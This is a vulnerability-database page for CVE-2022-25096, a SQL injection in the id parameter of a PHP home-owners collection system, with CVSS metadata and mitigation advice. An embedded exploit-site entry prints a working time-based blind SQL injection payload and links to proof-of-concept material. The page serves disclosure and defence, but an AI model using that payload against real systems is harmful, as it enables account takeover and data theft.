Description
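Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php. The record below classifies the flaw as CWE-89 and scores it CVSS v3.1 9.8 (AV:N/AC:L/PR:N/UI:N), meaning the parameter is rated as reachable over the network without authentication or user interaction; the CVSS v2 score of 7.5 describes the same issue on the older scale. None of the listed references is tagged as a patch, so deployments of v1.0 should restrict access to the application and treat the id value as untrusted input (integer validation, bound query parameters) until a fix is confirmed. CVE-2022-25029 in the related data is a rejected duplicate of this entry.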
Affected Software
Related
{"id": "CVE-2022-25096", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-25096", "description": "Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.", "published": "2022-02-26T00:15:00", "modified": "2022-03-08T14:57:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25096", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/50732", "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management"], "cvelist": ["CVE-2022-25096"], "immutableFields": [], "lastseen": "2022-03-23T10:26:03", "viewCount": 40, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-25029"]}, {"type": "zdt", "idList": ["1337DAY-ID-37430"]}]}, "score": {"value": 4.7, "vector": 
"NONE"}, "backreferences": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-37430"]}]}, "vulnersScore": 4.7}, "_state": {"dependencies": 1659964613, "score": 1659965167}, "_internal": {"score_hash": "2c4dad4f1632806db90af9425ae4559c"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0"], "cpe23": ["cpe:2.3:a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "home_owners_collection_management_system_project:home_owners_collection_management_system", "version": "1.0", "operator": "eq", "name": "home owners collection management system project home owners collection management system"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.exploit-db.com/exploits/50732", "name": "https://www.exploit-db.com/exploits/50732", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "name": "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management", "name": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management", "refsource": "MISC", "tags": ["Third Party Advisory"]}]}
{"zdt": [{"lastseen": "2022-03-08T16:05:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Owners Collection Management System v1.0 SQL - Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25096"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37430", "href": "https://0day.today/exploit/description/37430", "sourceData": "## Title: Owners Collection Management System v1.0 SQL - Injections \n## Author: nu11secur1ty\n## Vendor: https://www.sourcecodester.com/users/tips23\n## Software: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html\n## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096\n\n## Description:\nHome Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.\nThe `id` parameter from Owners Collection Management System v1.0 appears to be vulnerable to SQL injection attacks. 
\nThe attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.\n\nStatus: CRITICAL\n\n[+] Payloads:\n\n```mysql\n---\nParameter: id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=0' AND (SELECT 4743 FROM (SELECT(SLEEP(5)))BjBt)-- ogKy&page=members/view_member\n---\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096)\n\n## Proof and Exploit:\n[href](https://streamable.com/y6qdio)\n", "sourceHref": "https://0day.today/exploit/37430", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-13T19:08:00", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-25096. Reason: This candidate is a duplicate of CVE-2022-25096. Notes: All CVE users should reference CVE-2022-25096 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2022-02-28T23:15:00", "type": "cve", "title": "CVE-2022-25029", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-25029", "CVE-2022-25096"], "modified": "2022-06-13T17:15:00", "cpe": [], "id": "CVE-2022-25029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25029", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}]}